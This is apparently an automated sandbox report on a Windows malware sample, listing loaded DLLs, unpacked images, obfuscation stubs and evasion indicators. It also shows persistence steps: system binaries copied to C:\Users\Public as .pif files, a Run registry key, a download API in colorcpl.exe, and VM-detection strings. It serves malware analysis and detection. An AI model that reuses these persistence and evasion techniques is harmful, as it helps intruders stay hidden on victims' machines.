                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\nft438A5fN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: nft438A5fN.exe Static file information: File size 1244672 > 1048576
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
                Source: Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr

                Data Obfuscation

                Source: Yara match File source: 0.2.nft438A5fN.exe.23465a8.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: alpha.pif.5.dr Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02CA894C
                Source: alpha.pif.5.dr Static PE information: section name: .didat
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C963AE push 02C9640Bh; ret 0_2_02C96403
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C963B0 push 02C9640Bh; ret 0_2_02C96403
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9C349 push 8B02C9C1h; ret 0_2_02C9C34E
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBC378 push 02CBC56Eh; ret 0_2_02CBC566
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C96782 push 02C967C6h; ret 0_2_02C967BE
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C96784 push 02C967C6h; ret 0_2_02C967BE
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D6E716 push ecx; ret 0_2_02D6E729
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D4C446 push ecx; ret 0_2_02D4C459
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9C56C push ecx; mov dword ptr [esp], edx 0_2_02C9C571
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBC570 push 02CBC56Eh; ret 0_2_02CBC566
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA8AD8 push 02CA8B10h; ret 0_2_02CA8B08
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAAADF push 02CAAB18h; ret 0_2_02CAAB10
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAAAE0 push 02CAAB18h; ret 0_2_02CAAB10
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D04A50 push eax; ret 0_2_02D04B20
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9CBEC push 02C9CD72h; ret 0_2_02C9CD6A
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9CBE3 push 02C9CD72h; ret 0_2_02C9CD6A
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA886C push 02CA88AEh; ret 0_2_02CA88A6
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA6948 push 02CA69F3h; ret 0_2_02CA69EB
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA6946 push 02CA69F3h; ret 0_2_02CA69EB
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA2F60 push 02CA2FD6h; ret 0_2_02CA2FCE
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD2FC push 02CBD367h; ret 0_2_02CBD35F
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9332C push eax; ret 0_2_02C93368
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD0AC push 02CBD125h; ret 0_2_02CBD11D
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA306B push 02CA30B9h; ret 0_2_02CA30B1
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA306C push 02CA30B9h; ret 0_2_02CA30B1
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D6F038 push eax; ret 0_2_02D6F056
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD1F8 push 02CBD288h; ret 0_2_02CBD280
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD144 push 02CBD1ECh; ret 0_2_02CBD1E4
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAF108 push ecx; mov dword ptr [esp], edx 0_2_02CAF10D
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9D5A0 push 02C9D5CCh; ret 0_2_02C9D5C4
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA790C push 02CA7989h; ret 0_2_02CA7981

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wuqtggvo.PIF
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03206EEB ShellExecuteW,URLDownloadToFileW, 11_2_03206EEB

                Boot Survival

                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_0321AB9E
                Source: C:\Users\user\Desktop\nft438A5fN.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wuqtggvo
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02CAAB1C
                Source: C:\Users\user\Desktop\nft438A5fN.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320F7E2 Sleep,ExitProcess, 11_2_0320F7E2
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8F7E2 Sleep,ExitProcess, 21_2_02E8F7E2
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 11_2_0321A7D9
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 21_2_02E9A7D9
                Source: C:\Users\Public\alpha.pif API coverage: 6.3 %
                Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 4.9 %
                Source: C:\Users\Public\alpha.pif API coverage: 7.7 %
                Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 4.9 %
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\Public\xpha.pif Last function: Thread delayed
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02C95908
                Source: C:\Users\Public\alpha.pif Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_00050207
                Source: C:\Users\Public\alpha.pif Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_0005589A
                Source: C:\Users\Public\alpha.pif Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose, 7_2_00063E66
                Source: C:\Users\Public\alpha.pif Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00054EC1
                Source: C:\Users\Public\alpha.pif Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 7_2_0004532E
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0321C322
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0320C388
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0320928E
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_032096A0
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0320BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_03219B86
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03207877 FindFirstFileW,FindNextFileW, 11_2_03207877
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_03208847
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0324E8F9 FindFirstFileExA, 11_2_0324E8F9
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0320BD72
                Source: C:\Users\Public\alpha.pif Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 15_2_0005589A
                Source: C:\Users\Public\alpha.pif Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 15_2_00050207
                Source: C:\Users\Public\alpha.pif Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose, 15_2_00063E66
                Source: C:\Users\Public\alpha.pif Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 15_2_00054EC1
                Source: C:\Users\Public\alpha.pif Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 15_2_0004532E
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 21_2_02E8928E
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 21_2_02E8C388
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 21_2_02E9C322
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 21_2_02E896A0
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW, 21_2_02E99B86
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 21_2_02E8BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02ECE8F9 FindFirstFileExA, 21_2_02ECE8F9
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW, 21_2_02E87877
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 21_2_02E88847
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 21_2_02E8BD72
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_03207CD2
                Source: Amcache.hve.14.dr Binary or memory string: VMware
                Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
                Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
                Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1611613314.000000000080E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
